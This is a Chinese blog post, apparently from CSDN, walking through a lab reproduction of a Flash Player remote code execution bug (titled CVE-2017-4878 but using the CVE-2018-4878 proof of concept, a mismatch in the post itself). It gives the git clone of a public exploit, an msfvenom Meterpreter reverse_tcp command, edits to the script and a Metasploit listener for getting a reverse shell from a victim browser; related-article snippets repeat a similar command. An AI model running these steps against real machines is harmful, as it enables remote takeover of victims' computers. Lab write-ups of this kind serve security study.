CVE-2017-4878 漏洞复现(Flash Player当前最新版本28.0.0.137以及之前的所有版本)

最新推荐文章于 2020-11-23 15:34:31 发布
最新推荐文章于 2020-11-23 15:34:31 发布
阅读量1.3k 收藏
点赞数
文章标签: Flash Player当前最新版本28.0.0.137以及之前的所有
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39627497/article/details/84848495
版权

CVE-2017-4878 漏洞复现
**

漏洞介绍

**

1、漏洞概述
Flash Player当前最新版本28.0.0.137以及之前的所有版本
2 漏洞复现环境:
渗透机:Kali Linux + POC代码
靶机:win7+IE8.0+FLASH player
为了节省时间直接在 GitHub上下载poc 代码

3 漏洞复现实验过程:
复制下载链接:
在这里插入图片描述

git clone https://github.com/anbai-inc/CVE-2018-4878.git

使用git clone 命令 + 下载链接的方式 将POC 代码复制到本地 home目录下
或者直接在本机上下载然后复制到kali 中也是一样的效果
在这里插入图片描述

打开文件
在这里插入图片描述

我们需要对cve-2018-48778.py进行修改
在这里插入图片描述

将True 修改为False

还需要替换掉代码中原有的shellcode
在这里插入图片描述

使用命令
Msfvenom -p windows/meterpreter/reverse_tcp lhost = ip lport = port –f python > filename.txt
在这里插入图片描述
Cat shellcode.txt
在这里插入图片描述
将生成的shellcode.txt 内容替换原来 cve-2018-4878.py 中的shellcode
在这里插入图片描述

运行python 程序
在这里插入图片描述
运行出错了
貌似是程序中路径的问题
将路径修改成当前文件的路径
在这里插入图片描述
运行成功
在这里插入图片描述
查看文件
在这里插入图片描述
进入msfconsole 设置载荷
在这里插入图片描述
设置lhost 和lport
在这里插入图片描述
打开IE 访问http://192.168.88.107/test.html
在这里插入图片描述
但是由于电脑 falsh 插件的更新 和补丁的修复
没有向kali 反弹shell 如果换为28.0.0.137以及之前的所有版本都会建立反弹shell
在这里插入图片描述

长哇儿
关注
Flash漏洞CVE-2018-4878复现
玄道的网安博客
07-29 1368
简介 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 影响版本 FlashPlayer28.0.0.137及以前的所有版本 漏洞复现 使用msfvenom生成shell代码 生成代码,其中lhost为kali的ip地址,lport为自定义的端口号 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=66.
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
flash-player-ppapi-28.0.0.137-release.x86_64.rpm
07-11
chrome中无法播放视频时候的flash问题, 能修复解决flash问题
Adobe证实Flash危险漏洞:涉及所有版本
weixin_34319999的博客
10-16 105
2019独角兽企业重金招聘Python工程师标准>>> ...
Adobe Flash cve-2018-4878漏洞复现
weixin_34391854的博客
05-16 274
漏洞概述2018年2月1日, Adobe官方发布了Adobe Flash Player系列产品的安全通告(APSA18-01),该0day漏洞编号为CVE-2018-4878,目前最新版本28.0.0.137及其以前版本的Adobe Flash Player均受漏洞影响,Adobe官方于2月5日发布此漏洞补丁。gongji者可以将恶意Flash文件嵌入Office文档,网页,或者桌面应用,当用户打...
漏洞复现】Adobe Flash Player安装程序的漏洞|Flash 0day(CVE-2018-15982)
VI___
01-13 493
一、CVE-2018-15982 ——任意代码执行漏洞 2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。 ...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address...
flashActiveX_27.0.0.183.exe
10-28
Adobe Flash Player是一种广泛使用的、专有的多媒体程序播放器。它最初由Macromedia编写,在Macromedia被Adobe收购后由Adobe继续开发并分发。Adobe Flash Player 最初设计目的为播放2维向量动画,但至此之后成为适合开发创造丰富型互联网应用程序、流视频音频的工具。Flash Player使用矢量图形的技术来最小化文件的大小以及创造节省网络带宽和下载时间的文件。因此Flash 成为嵌入网页中的小游戏、动画以及图形用户界面常用的格式。
flash安装程序
09-05
28.0flash安装软件包,完整版 经过完整测试 28.0flash安装软件包,完整版 经过完整测试
CVE-2018-4878 flash 漏洞利用教程
凝聚力安全团队
10-25 1506
目录漏洞描述漏洞检测漏洞利用漏洞加固参考链接 漏洞描述 漏洞检测 漏洞利用 漏洞加固 参考链接
Flash Player离线安装包下载
Finder_Way
01-04 6万+
部分网站在线培训文档、摄像头人脸识别之类的调用的flash插件,不安装或者插件过期、不匹配浏览器等,都会造成无法显示文档以及无法调用摄像头显示图像导致无法人脸识别等问题 培训文档打不开: 摄像头启用失败:  ,官网下载的在线安装包无法使用,提示安装初始化错误, 非常让人心烦,于是找到了离线安装包地址。 适用于IE的activex版,下载地址 https://www.flash.c...
探讨关于Flash Player的更多线索(22.12.28更新)
wujiuqier的博客
11-23 1956
Flash即将在2020年底停止支持。如果仍然有一些业内业务需要Flash我們应该如何应对,这里找到了更多的线索。 从Chromium官方的消息来看,预计将于2021年1月更新的88版本的内核将原生不支持Flash。即使国内继续支持也将无法在88版本以上内核的浏览器使用(这其中包括Win10 20H2开始自带的新版Edge浏览器)。 目前一些浏览器诸如百分浏览器、星愿浏览器均因某些不可描述的原因移除了集成的Flash。需要手动拷贝文件并从hosts屏蔽一些域名。 从已经掌握的各个CVE漏洞(未修复的和已修
提示“此Flash Player与您的地区不相容,请重新安装Flash”的解决办法
热门推荐
zyphio的专栏
07-13 10万+
  问题原因: 因为Flash相对于HTML5,有着运算效率低、资源占用大、安全性不高等缺点,随着HTML5越来越普及,Adobe已宣布2020年正式停止支持Flash这项技术。 但Adobe公司为了利益最大化,从Flash Player 30开始,就与国内某公司合作,推出中国特供版Flash Player,根据特供版用户协议,Flash Player将捆绑应用、广告等推广业务,同时会获取用户信...
CVE-2018-4878复现
大方子
10-07 4337
前言: CVE-2018-4878利用flash漏洞来进行攻击,如果受害者的flash版本28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。 1 漏洞影响范围 Flash Player28.0.0.137及以前的所有版本漏洞复现 2.1 测试环境 攻击机:kali2017 靶机:win7_x64+IE8+FLASH_playe...
cve-2017-7504漏洞复现
最新发布
08-23
对于CVE-2017-7504漏洞复现,请注意以下几个步骤: 1. 确认受影响的软件版本CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值